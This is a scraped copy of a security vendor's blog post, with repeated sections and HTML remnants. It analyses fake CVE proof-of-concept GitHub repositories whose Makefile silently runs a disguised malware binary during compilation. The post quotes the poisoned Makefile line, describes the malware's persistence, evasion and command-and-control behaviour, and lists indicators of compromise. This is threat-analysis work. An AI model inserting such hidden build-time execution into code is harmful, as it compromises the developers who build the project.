![\"Red](\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-1-1.jpg\")
<\/a><\/p>\n\n\n
<\/a><\/p>\n\n\n\n
From the submission records, it can be found that the attacker has uploaded relevant malicious codes multiple times from the end of June 2023.<\/p>\n\n\n
<\/a>The attack intention was revealed two days after the malicious code was uploaded, and repo users disputed an allegation in the issue that this PoC is fake and malicious code is implanted.<\/p>\n\n\n\n
<\/p>\n\n\n
<\/a>Analysis of Techniques and Tactics<\/h2>\n\n\n\n![\"Red](\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-5-1.jpg\")
<\/a>Figure 5 Execution flow<\/figcaption><\/figure>\n<\/div>\n\n\n<\/p>\n\n\n\n
Poisoning of disguised compiled configuration files<\/h3>\n\n\n\n
From the perspective of supply chain security<\/a>, attackers used code poisoning to carry out attacks in the process of code compilation. Instead of hosting the binary payload in a repository, as is often the case for phishing, implanting malicious code and compiling configuration files are undoubtedly more subtle.<\/p>\n\n\n\nCFLAGS= -I.\/inc\nLDFLAGS= -pthread -static\n\nall: obj $(TARGET) get_root\n\n$(TARGET): $(OBJECTS)\n $(CC) $(LDFLAGS) -o $@ $^\n strip $@\n.\/src\/aclocal.m4 <--Execute malicious programs contained in the repository<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
The Makefile compilation configuration file contains the commands required to compile and generate binaries, and an attacker inserts the process of executing the file aclocal.m4 in the src directory during the normal compilation flow. This file is actually a default configuration file in GNU automake, which is renamed to deceive the victim. The file aclocal.m4 itself is a malicious program for Linux systems. Once the user executes the make command, the compilation project will be enabled.<\/p>\n\n\n\n
<\/p>\n\n\n\n
aclocal.m4: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2,\nBuildID[sha1]=9fc8befaa32a1a88133dd077db0369576313e6d2, for GNU\/Linux 3.2.0, stripped<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
Multistage Malicious Sample kworker with Built-in Defense Evasion Feature<\/h3>\n\n\n\n
Copy itself to the HOME directory and add persistence at first execution<\/p>\n\n\n
\n![\"Red](\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-6-1.jpg\")
<\/a>Figure 6 Copy itself to the HOME directory and add persistence<\/figcaption><\/figure>\n<\/div>\n\n\nDefense Evasion: timestamp modification; attacker connection through timestamp forgery<\/p>\n\n\n
\n![\"Red](\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-7-1.jpg\")
<\/a>Figure 7 Defense evasion<\/figcaption><\/figure>\n<\/div>\n\n\nPull the content from the hardcoded URL and decrypt it.<\/p>\n\n\n
\n![\"Red](\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-8-2.jpg\")
<\/a>Figure 8 Pull the content and decrypt it<\/figcaption><\/figure>\n<\/div>\n\n\nDuring the test, it was found that when a request is made incorrectly, the attacker server returns empty content and blacklists the requested IP address.<\/p>\n\n\n
\n![\"Red](\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-9-1-1024x378.jpg\")
<\/a>Figure 9 Empty content is returned<\/figcaption><\/figure>\n<\/div>\n\n\nThe real content requested is a bash script [1]<\/sup>. On the one hand, this bash script collects information and uploads it to the public repository, and then sends it back to the repository for linking to the server; on the other hand, it realizes persistence and continuous control through SSH.<\/p>\n\n\n\n![\"Red](\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10-1-919x1024.jpg\")
<\/a>Figure 10 Returned content<\/figcaption><\/figure>\n<\/div>\n\n\nAs of this article, NSFOCUS Threat Intelligence<\/a> has supported detection and alert on threat intelligence of involved infrastructure. Some NSFOCUS’s products have captured attack events using the malware.<\/p>\n\n\n\n![\"Red](\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10--1024x462.png\")
<\/a>Figure 11 Screenshot from NSFOCUS Threat Intelligence (NTI)<\/figcaption><\/figure>\n<\/div>\n\n\nConclusion<\/h2>\n\n\n\n
In recent years, similar attacks targeting vulnerability researchers and red team members by using vulnerability exploits as baits are not uncommon. However, compared with the previous method of baiting malicious EXE files, implanting malicious codes in compiled configuration files makes the exploitation chain that triggers malicious behaviors during compilation more covert. However, it requires the victim to have the vulnerability EXP command line compilation ability, which undoubtedly screens out a number of people who are used to executing vulnerability exploitation programs simply downloaded on the Internet, which means that the target has been shifted to vulnerability researchers or red team members capable of weaponizing vulnerabilities.<\/p>\n\n\n\n
Based on the existing intelligence and preliminary detection of the attacker’s infrastructure, we believe that this code poisoning attack could be long-simmered and a part of a persistent attack: select a small project with low attention and low stars to test the feasibility, and collect necessary information for later intended activities.<\/p>\n\n\n\n
IOC Information <\/strong><\/p>\n\n\n\nMalicious Github Repo:<\/strong>
https:\/\/github.com\/ChriSanders22\/CVE-2023-20871-poc
https:\/\/github.com\/ChriSanders22\/CVE-2023-35829-poc
Malicious sample kworker SHA256: <\/strong>caa69b10b0bfca561dec90cbd1132b6dcb2c8a44d76a272a0b70b5c64776ff6c
Payload delivery, CnC address:<\/strong>
http:\/\/cunniloss[.]accesscam[.]org\/hash[.]php<\/p>\n\n\n\nReference<\/strong><\/p>\n\n\n\nFor anyone that has ran this PoC, consider your data stolen. This is what eventually runs on your host after a few stages. If you wanna analyse it, don't use a web browser or your IP will get blacklisted. #CVE_2023_35829<\/a> #backdoor<\/a> https:\/\/t.co\/gafdPfDc0r<\/a> pic.twitter.com\/fUIqclSARX<\/a><\/p>— Andrei Scutariu (@xnand_) July 4, 2023<\/a><\/blockquote>
<\/a><\/p>\n\n\n\n
Poisoning of disguised compiled configuration files<\/h3>\n\n\n\n
From the perspective of supply chain security<\/a>, attackers used code poisoning to carry out attacks in the process of code compilation. Instead of hosting the binary payload in a repository, as is often the case for phishing, implanting malicious code and compiling configuration files are undoubtedly more subtle.<\/p>\n\n\n\n <\/p>\n\n\n\n The Makefile compilation configuration file contains the commands required to compile and generate binaries, and an attacker inserts the process of executing the file aclocal.m4 in the src directory during the normal compilation flow. This file is actually a default configuration file in GNU automake, which is renamed to deceive the victim. The file aclocal.m4 itself is a malicious program for Linux systems. Once the user executes the make command, the compilation project will be enabled.<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n Copy itself to the HOME directory and add persistence at first execution<\/p>\n\n\n Defense Evasion: timestamp modification; attacker connection through timestamp forgery<\/p>\n\n\n Pull the content from the hardcoded URL and decrypt it.<\/p>\n\n\n During the test, it was found that when a request is made incorrectly, the attacker server returns empty content and blacklists the requested IP address.<\/p>\n\n\n The real content requested is a bash script [1]<\/sup>. On the one hand, this bash script collects information and uploads it to the public repository, and then sends it back to the repository for linking to the server; on the other hand, it realizes persistence and continuous control through SSH.<\/p>\n\n\n As of this article, NSFOCUS Threat Intelligence<\/a> has supported detection and alert on threat intelligence of involved infrastructure. Some NSFOCUS’s products have captured attack events using the malware.<\/p>\n\n\n In recent years, similar attacks targeting vulnerability researchers and red team members by using vulnerability exploits as baits are not uncommon. However, compared with the previous method of baiting malicious EXE files, implanting malicious codes in compiled configuration files makes the exploitation chain that triggers malicious behaviors during compilation more covert. However, it requires the victim to have the vulnerability EXP command line compilation ability, which undoubtedly screens out a number of people who are used to executing vulnerability exploitation programs simply downloaded on the Internet, which means that the target has been shifted to vulnerability researchers or red team members capable of weaponizing vulnerabilities.<\/p>\n\n\n\n Based on the existing intelligence and preliminary detection of the attacker’s infrastructure, we believe that this code poisoning attack could be long-simmered and a part of a persistent attack: select a small project with low attention and low stars to test the feasibility, and collect necessary information for later intended activities.<\/p>\n\n\n\n IOC Information <\/strong><\/p>\n\n\n\n Malicious Github Repo:<\/strong> Reference<\/strong><\/p>\n\n\n\n For anyone that has ran this PoC, consider your data stolen. This is what eventually runs on your host after a few stages. If you wanna analyse it, don't use a web browser or your IP will get blacklisted. #CVE_2023_35829<\/a> #backdoor<\/a> https:\/\/t.co\/gafdPfDc0r<\/a> pic.twitter.com\/fUIqclSARX<\/a><\/p>— Andrei Scutariu (@xnand_) July 4, 2023<\/a><\/blockquote>CFLAGS= -I.\/inc\nLDFLAGS= -pthread -static\n\nall: obj $(TARGET) get_root\n\n$(TARGET): $(OBJECTS)\n $(CC) $(LDFLAGS) -o $@ $^\n strip $@\n.\/src\/aclocal.m4 <--Execute malicious programs contained in the repository<\/code><\/pre>\n\n\n\naclocal.m4: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2,\nBuildID[sha1]=9fc8befaa32a1a88133dd077db0369576313e6d2, for GNU\/Linux 3.2.0, stripped<\/code><\/pre>\n\n\n\nMultistage Malicious Sample kworker with Built-in Defense Evasion Feature<\/h3>\n\n\n\n
<\/a><\/a><\/a><\/a><\/a><\/a>Conclusion<\/h2>\n\n\n\n
https:\/\/github.com\/ChriSanders22\/CVE-2023-20871-poc
https:\/\/github.com\/ChriSanders22\/CVE-2023-35829-poc
Malicious sample kworker SHA256: <\/strong>caa69b10b0bfca561dec90cbd1132b6dcb2c8a44d76a272a0b70b5c64776ff6c
Payload delivery, CnC address:<\/strong>
http:\/\/cunniloss[.]accesscam[.]org\/hash[.]php<\/p>\n\n\n\n